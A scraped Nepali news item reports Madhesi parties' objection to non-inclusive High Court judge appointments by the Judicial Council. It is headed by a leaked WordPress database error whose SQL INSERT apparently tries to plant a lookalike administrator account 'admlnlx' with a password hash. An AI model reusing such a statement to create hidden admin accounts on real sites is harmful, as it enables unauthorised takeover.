WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdPUzQY0/.HfjJHv7a9Y8Swxqahfqc0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:14:54', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २९-
संयुक्त लोकतान्त्रिक मधेसी मोर्चाले राजनीतिक भागबण्डामा न्यायपरिषदले उच्च अदालतमा गरेको न्यायाधीश नियुक्तिमा कडा आपत्ति जनाएको छ ।
शुक्रबार विहान प्रधानमन्त्री निवास बालुवाटामा बसेको कांग्रेस–माओवादी केन्द्र र मधेसवादी दलका शीर्ष नेताहरुको बैठकमा मोर्चाले उच्च अदालतमा एकलौटी ढंगबाट गरिएको न्यायाधीश नियुक्तिमा आपत्ति जनाएको हो । र, मधेसीको नाममा आफ्नो भाग पनि खोजेको छ ।
तमलोपा सह अध्यक्ष वृखेशचन्द्र लालका अनुसार मधेसवादी दलका नेताहरुले प्रधानमन्त्री प्रचण्ड र कांग्रेस सभापति शेरबहादुर देउवासमक्ष न्यायाधीश नियुक्तिमा समावेशी र समानुपातिक प्रतिनिधित्व नभएको भन्दै आपत्ति जनाएका थिए ।
‘न्यायाधीश नियुक्तिमा समावेशी र समानुपातिक प्रतिनिधित्व भएन् भनेर हामीले सत्तापक्षको ध्यानाकर्षण गरायौं,’ नेता लालले भने- ‘उहाँहरुले सच्याउँछौं भन्नुभएको छ । न्याय परिषद्को अहिलेको निर्णय समावेशी नभएको हाम्रो ठहर छ ।’